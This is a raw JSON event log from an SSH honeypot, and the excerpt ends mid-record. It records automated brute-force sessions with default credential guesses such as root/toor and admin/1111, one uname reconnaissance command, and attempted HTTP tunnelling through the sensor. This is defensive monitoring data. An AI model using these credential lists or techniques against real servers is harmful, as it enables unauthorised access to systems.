{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:48:25.832799Z","src_ip":"212.227.235.229","session":"a5ac44907e6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39748,"dst_ip":"1.2.3.4","dst_port":22,"session":"d02468b45771","protocol":"ssh","message":"New connection: 212.227.235.229:39748 (1.2.3.4:22) [session: d02468b45771]","sensor":"my-vps","timestamp":"2025-08-31T04:48:25.913068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:25.917984Z","src_ip":"212.227.235.229","session":"d02468b45771"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:26.074337Z","src_ip":"212.227.235.229","session":"a5ac44907e6a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:26.309490Z","src_ip":"212.227.235.229","session":"d02468b45771"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47060,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fca4a2a4520","protocol":"ssh","message":"New connection: 212.227.125.160:47060 (1.2.3.4:22) [session: 8fca4a2a4520]","sensor":"my-vps","timestamp":"2025-08-31T04:48:26.451685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:26.452464Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:26.635355Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.183378Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:48:27.567868Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.568658Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44394,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac122db517a","protocol":"ssh","message":"New connection: 212.227.235.229:44394 (1.2.3.4:22) [session: 6ac122db517a]","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.570501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.571384Z","src_ip":"212.227.235.229","session":"6ac122db517a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.693738Z","src_ip":"212.227.235.229","session":"6ac122db517a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.752556Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.753620Z","src_ip":"212.227.125.160","session":"8fca4a2a4520"}
{"eventid":"cowrie.login.failed","username":"helpdesk","password":"helpdesk","message":"login attempt [helpdesk/helpdesk] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:27.938437Z","src_ip":"212.227.235.229","session":"d02468b45771"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"abcd@123456","message":"login attempt [moodle/abcd@123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:28.221784Z","src_ip":"212.227.235.229","session":"6ac122db517a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:29.345693Z","src_ip":"212.227.235.229","session":"6ac122db517a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57008,"dst_ip":"1.2.3.4","dst_port":22,"session":"18aeccb97861","protocol":"ssh","message":"New connection: 212.227.235.229:57008 (1.2.3.4:22) [session: 18aeccb97861]","sensor":"my-vps","timestamp":"2025-08-31T04:48:29.769711Z"}
{"eventid":"cowrie.session.closed","duration":"57.7","message":"Connection lost after 57.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:29.938634Z","src_ip":"212.227.125.160","session":"78e10392a954"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:29.963406Z","src_ip":"212.227.235.229","session":"18aeccb97861"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:30.020183Z","src_ip":"212.227.235.229","session":"18aeccb97861"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:30.661936Z","src_ip":"212.227.235.229","session":"d02468b45771"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.292617Z","src_ip":"212.227.235.229","session":"18aeccb97861"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40036,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0f037557147","protocol":"ssh","message":"New connection: 212.227.235.229:40036 (1.2.3.4:22) [session: b0f037557147]","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.339794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.361733Z","src_ip":"212.227.235.229","session":"b0f037557147"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.558731Z","session":"18aeccb97861"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.656841Z","src_ip":"212.227.235.229","session":"b0f037557147"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:48:32.818613Z","src_ip":"212.227.235.229","session":"18aeccb97861"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:33.068813Z","src_ip":"212.227.235.229","session":"18aeccb97861"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36116,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb94eab72bb1","protocol":"ssh","message":"New connection: 212.227.125.160:36116 (1.2.3.4:22) [session: fb94eab72bb1]","sensor":"my-vps","timestamp":"2025-08-31T04:48:34.002555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:48:34.004329Z","src_ip":"212.227.125.160","session":"fb94eab72bb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:48:34.192245Z","src_ip":"212.227.125.160","session":"fb94eab72bb1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:34.597955Z","src_ip":"212.227.235.229","session":"b0f037557147"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:48:34.949099Z","src_ip":"212.227.125.160","session":"fb94eab72bb1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:36.139678Z","src_ip":"212.227.125.160","session":"fb94eab72bb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57012,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2499b893bf2","protocol":"ssh","message":"New connection: 212.227.235.229:57012 (1.2.3.4:22) [session: f2499b893bf2]","sensor":"my-vps","timestamp":"2025-08-31T04:48:36.973145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:48:36.974964Z","src_ip":"212.227.235.229","session":"f2499b893bf2"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:48:37.259868Z","src_ip":"212.227.235.229","session":"b0f037557147"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hma